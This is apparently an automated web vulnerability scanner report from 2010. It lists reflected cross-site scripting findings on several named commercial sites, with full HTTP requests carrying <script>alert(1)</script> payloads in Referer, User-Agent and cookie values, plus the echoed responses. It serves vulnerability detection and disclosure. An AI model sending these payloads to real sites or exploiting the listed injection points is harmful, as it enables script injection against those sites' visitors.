GET /cgi-bin/10kw/login.cgi HTTP/1.1 Host: webid2.gs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=6341e"><script>alert(1)</script>a7058016663
Response
HTTP/1.0 500 Internal Server Error Date: Fri, 26 Nov 2010 20:24:34 GMT Server: Apache GS_AUTH_STATUS: FAILURE GS_AUTH_SUB_STATUS: ERROR GS_AUTH_STATUS_MESSAGE: An internal error has occured; check server logs for more detail. P3P: policyref="/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: NSC_xfcje2.ht.dpn-443-wc=ffffffff09c43f5b45525d5f4f58455e445a4a420e6f;path=/;secure
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <?xml version="1.0" encoding="UTF-8" ?> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <t ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=6341e"><script>alert(1)</script>a7058016663"> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload f2f20<script>alert(1)</script>12272eecd75 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=f2f20<script>alert(1)</script>12272eecd75
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:24:47 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 88727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <h4>f2f20<script>alert(1)</script>12272eecd75 - Google search</h4> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c4d1"><script>alert(1)</script>18475beb865 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=9c4d1"><script>alert(1)</script>18475beb865
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:24:45 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 88741
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=9c4d1"><script>alert(1)</script>18475beb865" /> ...[SNIP]...
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 7938b<script>alert(1)</script>5c68a4a8479 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /version2/hit_rm.cfm HTTP/1.1 Host: www.adoutput.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7938b<script>alert(1)</script>5c68a4a8479 Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 26 Nov 2010 20:24:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8
<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></ ...[SNIP]... <font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7938b<script>alert(1)</script>5c68a4a8479</td> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 56af3--><script>alert(1)</script>57134f82163 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /x/y/MyPage.asp HTTP/1.1 Host: www.mysite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=56af3--><script>alert(1)</script>57134f82163
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:22:58 GMT Server: .V10 Apache Keep-Alive: timeout=999999, max=999999 Connection: Keep-Alive Content-Type: text/html Content-Length: 13277
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2550"><script>alert(1)</script>754871af0ad was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /p-e4QUTcIS3_f12 HTTP/1.1 Host: www.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=c2550"><script>alert(1)</script>754871af0ad
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: qcVisitor=0|32|1290803013112|0|NOTSET; Expires=Sun, 18-Nov-2040 20:23:33 GMT; Path=/ Set-Cookie: JSESSIONID=515AACA53ADC280202AB321E2952A6B0; Path=/ Set-Cookie: qcPageID="10.122.9.112,8000,74,Fri, 26 Nov 2010 20:23:33 UTC"; Version=1; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Fri, 26 Nov 2010 20:23:32 GMT Connection: close
The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload de63b<script>alert(1)</script>c6df1d58f2f was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p72205782&PRAd=56621686&AR_C=39457440\ HTTP/1.1 Host: ar.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ar_p71955200=exp=2&initExp=Fri Nov 26 16:10:47 2010&recExp=Fri Nov 26 16:10:47 2010&prad=264210321&arc=189391079&; BMX_3PC=1de63b<script>alert(1)</script>c6df1d58f2f; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1290802692%2E015%2Cwait%2D%3E10000%2C; UID=1be48349-204.0.5.41-1289109066; ar_p72205782=exp=1&initExp=Fri Nov 26 20:18:12 2010&recExp=Fri Nov 26 20:18:12 2010&prad=56621686&arc=39457440&; ar_p43112268=exp=1&initExp=Tue Oct 12 23:30:15 2010&recExp=Tue Oct 12 23:30:15 2010&prad=48493791&arc=37093102&; ar_p68511049=exp=22&initExp=Sun Nov 7 05:51:02 2010&recExp=Tue Nov 9 12:24:17 2010&prad=264243128&arc=186035359&;
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Nov 2010 20:51:35 GMT Content-Type: application/x-javascript Connection: close Vary: Accept-Encoding Set-Cookie: ar_p72205782=exp=2&initExp=Fri Nov 26 20:18:12 2010&recExp=Fri Nov 26 20:51:35 2010&prad=56621686&arc=39457440%5C&; expires=Thu 24-Feb-2011 20:51:35 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 30398
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"56621686",Pid:"p72205782",Arc:"39457440\",Location:C ...[SNIP]... E.BMX.Broker.Cookies={ "UID": '1be48349-204.0.5.41-1289109066', "ar_p71955200": 'exp=2&initExp=Fri Nov 26 16:10:47 2010&recExp=Fri Nov 26 16:10:47 2010&prad=264210321&arc=189391079&', "BMX_3PC": '1de63b<script>alert(1)</script>c6df1d58f2f', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1290802692%2E015%2Cwait%2D%3E10000%2C', "ar_p68511049": 'exp=22&initExp=Sun Nov 7 05:51:02 2010&recExp=Tue Nov 9 12:24:17 2010&prad=264243128&arc=186035359&' ...[SNIP]...
The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload df569<script>alert(1)</script>eae1b697aa8 was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p72205782&PRAd=56621686&AR_C=39457440\ HTTP/1.1 Host: ar.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ar_p71955200=exp=2&initExp=Fri Nov 26 16:10:47 2010&recExp=Fri Nov 26 16:10:47 2010&prad=264210321&arc=189391079&; BMX_3PC=1; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1290802692%2E015%2Cwait%2D%3E10000%2Cdf569<script>alert(1)</script>eae1b697aa8; UID=1be48349-204.0.5.41-1289109066; ar_p72205782=exp=1&initExp=Fri Nov 26 20:18:12 2010&recExp=Fri Nov 26 20:18:12 2010&prad=56621686&arc=39457440&; ar_p43112268=exp=1&initExp=Tue Oct 12 23:30:15 2010&recExp=Tue Oct 12 23:30:15 2010&prad=48493791&arc=37093102&; ar_p68511049=exp=22&initExp=Sun Nov 7 05:51:02 2010&recExp=Tue Nov 9 12:24:17 2010&prad=264243128&arc=186035359&;
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Nov 2010 20:51:37 GMT Content-Type: application/x-javascript Connection: close Vary: Accept-Encoding Set-Cookie: ar_p72205782=exp=2&initExp=Fri Nov 26 20:18:12 2010&recExp=Fri Nov 26 20:51:37 2010&prad=56621686&arc=39457440%5C&; expires=Thu 24-Feb-2011 20:51:37 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 30398
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"56621686",Pid:"p72205782",Arc:"39457440\",Location:C ...[SNIP]... 00": 'exp=2&initExp=Fri Nov 26 16:10:47 2010&recExp=Fri Nov 26 16:10:47 2010&prad=264210321&arc=189391079&', "BMX_3PC": '1', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1290802692%2E015%2Cwait%2D%3E10000%2Cdf569<script>alert(1)</script>eae1b697aa8', "ar_p68511049": 'exp=22&initExp=Sun Nov 7 05:51:02 2010&recExp=Tue Nov 9 12:24:17 2010&prad=264243128&arc=186035359&', "ar_p43112268": 'exp=1&initExp=Tue Oct 12 23:30:15 2010&recExp=Tue Oct 12 2 ...[SNIP]...
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 61d80<script>alert(1)</script>6b94cc7b792 was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p72205782&PRAd=56621686&AR_C=39457440 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/promotions/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p43112268=exp=1&initExp=Tue Oct 12 23:30:15 2010&recExp=Tue Oct 12 23:30:15 2010&prad=48493791&arc=37093102&; ar_p68511049=exp=22&initExp=Sun Nov 7 05:51:02 2010&recExp=Tue Nov 9 12:24:17 2010&prad=264243128&arc=186035359&; ar_p71955200=exp=2&initExp=Fri Nov 26 16:10:47 2010&recExp=Fri Nov 26 16:10:47 2010&prad=264210321&arc=189391079&; UID=1be48349-204.0.5.41-128910906661d80<script>alert(1)</script>6b94cc7b792
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Nov 2010 20:47:51 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p72205782=exp=1&initExp=Fri Nov 26 20:47:51 2010&recExp=Fri Nov 26 20:47:51 2010&prad=56621686&arc=39457440&; expires=Thu 24-Feb-2011 20:47:51 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1290804471; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 30180
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"56621686",Pid:"p72205782",Arc:"39457440",Location:CO ...[SNIP]... 10:47 2010&prad=264210321&arc=189391079&', "ar_p43112268": 'exp=1&initExp=Tue Oct 12 23:30:15 2010&recExp=Tue Oct 12 23:30:15 2010&prad=48493791&arc=37093102&', "UID": '1be48349-204.0.5.41-128910906661d80<script>alert(1)</script>6b94cc7b792', "ar_p68511049": 'exp=22&initExp=Sun Nov 7 05:51:02 2010&recExp=Tue Nov 9 12:24:17 2010&prad=264243128&arc=186035359&' }; COMSCORE.BMX.Broker.GlobalConfig={ "urlExcludeList": "http://photobucket ...[SNIP]...
The value of the ar_p43112268 cookie is copied into the HTML document as plain text between tags. The payload 2af1f<script>alert(1)</script>bfe055308da was submitted in the ar_p43112268 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p72205782&PRAd=56621686&AR_C=39457440 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/promotions/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p43112268=exp=1&initExp=Tue Oct 12 23:30:15 2010&recExp=Tue Oct 12 23:30:15 2010&prad=48493791&arc=37093102&2af1f<script>alert(1)</script>bfe055308da; ar_p68511049=exp=22&initExp=Sun Nov 7 05:51:02 2010&recExp=Tue Nov 9 12:24:17 2010&prad=264243128&arc=186035359&; ar_p71955200=exp=2&initExp=Fri Nov 26 16:10:47 2010&recExp=Fri Nov 26 16:10:47 2010&prad=264210321&arc=189391079&; UID=1be48349-204.0.5.41-1289109066
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Nov 2010 20:47:50 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p72205782=exp=1&initExp=Fri Nov 26 20:47:50 2010&recExp=Fri Nov 26 20:47:50 2010&prad=56621686&arc=39457440&; expires=Thu 24-Feb-2011 20:47:50 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1290804470; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 30180
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"56621686",Pid:"p72205782",Arc:"39457440",Location:CO ...[SNIP]... Nov 7 05:51:02 2010&recExp=Tue Nov 9 12:24:17 2010&prad=264243128&arc=186035359&', "ar_p43112268": 'exp=1&initExp=Tue Oct 12 23:30:15 2010&recExp=Tue Oct 12 23:30:15 2010&prad=48493791&arc=37093102&2af1f<script>alert(1)</script>bfe055308da' }; COMSCORE.BMX.Broker.GlobalConfig={ "urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http ...[SNIP]...
The value of the ar_p68511049 cookie is copied into the HTML document as plain text between tags. The payload 930d6<script>alert(1)</script>437e4745ed9 was submitted in the ar_p68511049 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p72205782&PRAd=56621686&AR_C=39457440 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/promotions/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p43112268=exp=1&initExp=Tue Oct 12 23:30:15 2010&recExp=Tue Oct 12 23:30:15 2010&prad=48493791&arc=37093102&; ar_p68511049=exp=22&initExp=Sun Nov 7 05:51:02 2010&recExp=Tue Nov 9 12:24:17 2010&prad=264243128&arc=186035359&930d6<script>alert(1)</script>437e4745ed9; ar_p71955200=exp=2&initExp=Fri Nov 26 16:10:47 2010&recExp=Fri Nov 26 16:10:47 2010&prad=264210321&arc=189391079&; UID=1be48349-204.0.5.41-1289109066
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Nov 2010 20:47:51 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p72205782=exp=1&initExp=Fri Nov 26 20:47:51 2010&recExp=Fri Nov 26 20:47:51 2010&prad=56621686&arc=39457440&; expires=Thu 24-Feb-2011 20:47:51 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1290804471; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 30180
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"56621686",Pid:"p72205782",Arc:"39457440",Location:CO ...[SNIP]... 26 16:10:47 2010&recExp=Fri Nov 26 16:10:47 2010&prad=264210321&arc=189391079&', "ar_p68511049": 'exp=22&initExp=Sun Nov 7 05:51:02 2010&recExp=Tue Nov 9 12:24:17 2010&prad=264243128&arc=186035359&930d6<script>alert(1)</script>437e4745ed9', "ar_p43112268": 'exp=1&initExp=Tue Oct 12 23:30:15 2010&recExp=Tue Oct 12 23:30:15 2010&prad=48493791&arc=37093102&' }; COMSCORE.BMX.Broker.GlobalConfig={ "urlExcludeList": "http://photobucket.co ...[SNIP]...
The value of the ar_p71955200 cookie is copied into the HTML document as plain text between tags. The payload 30612<script>alert(1)</script>312dd372ebd was submitted in the ar_p71955200 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p72205782&PRAd=56621686&AR_C=39457440 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/promotions/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p43112268=exp=1&initExp=Tue Oct 12 23:30:15 2010&recExp=Tue Oct 12 23:30:15 2010&prad=48493791&arc=37093102&; ar_p68511049=exp=22&initExp=Sun Nov 7 05:51:02 2010&recExp=Tue Nov 9 12:24:17 2010&prad=264243128&arc=186035359&; ar_p71955200=exp=2&initExp=Fri Nov 26 16:10:47 2010&recExp=Fri Nov 26 16:10:47 2010&prad=264210321&arc=189391079&30612<script>alert(1)</script>312dd372ebd; UID=1be48349-204.0.5.41-1289109066
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Nov 2010 20:47:51 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p72205782=exp=1&initExp=Fri Nov 26 20:47:51 2010&recExp=Fri Nov 26 20:47:51 2010&prad=56621686&arc=39457440&; expires=Thu 24-Feb-2011 20:47:51 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1290804471; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 30180
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"56621686",Pid:"p72205782",Arc:"39457440",Location:CO ...[SNIP]... ll};})();}COMSCORE.BMX.Broker.Cookies={ "UID": '1be48349-204.0.5.41-1289109066', "ar_p71955200": 'exp=2&initExp=Fri Nov 26 16:10:47 2010&recExp=Fri Nov 26 16:10:47 2010&prad=264210321&arc=189391079&30612<script>alert(1)</script>312dd372ebd', "ar_p68511049": 'exp=22&initExp=Sun Nov 7 05:51:02 2010&recExp=Tue Nov 9 12:24:17 2010&prad=264243128&arc=186035359&', "ar_p43112268": 'exp=1&initExp=Tue Oct 12 23:30:15 2010&recExp=Tue Oct 12 2 ...[SNIP]...
The value of the ar_p72205782 cookie is copied into the HTML document as plain text between tags. The payload 6e07e<script>alert(1)</script>ff145e850bf was submitted in the ar_p72205782 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p72205782&PRAd=56621686&AR_C=39457440\ HTTP/1.1 Host: ar.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ar_p71955200=exp=2&initExp=Fri Nov 26 16:10:47 2010&recExp=Fri Nov 26 16:10:47 2010&prad=264210321&arc=189391079&; BMX_3PC=1; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1290802692%2E015%2Cwait%2D%3E10000%2C; UID=1be48349-204.0.5.41-1289109066; ar_p72205782=exp=1&initExp=Fri Nov 26 20:18:12 2010&recExp=Fri Nov 26 20:18:12 2010&prad=56621686&arc=39457440&6e07e<script>alert(1)</script>ff145e850bf; ar_p43112268=exp=1&initExp=Tue Oct 12 23:30:15 2010&recExp=Tue Oct 12 23:30:15 2010&prad=48493791&arc=37093102&; ar_p68511049=exp=22&initExp=Sun Nov 7 05:51:02 2010&recExp=Tue Nov 9 12:24:17 2010&prad=264243128&arc=186035359&;
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Nov 2010 20:51:38 GMT Content-Type: application/x-javascript Connection: close Vary: Accept-Encoding Set-Cookie: ar_p72205782=exp=2&initExp=Fri Nov 26 20:18:12 2010&recExp=Fri Nov 26 20:51:38 2010&6e07e<script>alert(1)</script>ff145e850bf=&prad=56621686&arc=39457440%5C&; expires=Thu 24-Feb-2011 20:51:38 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 30398
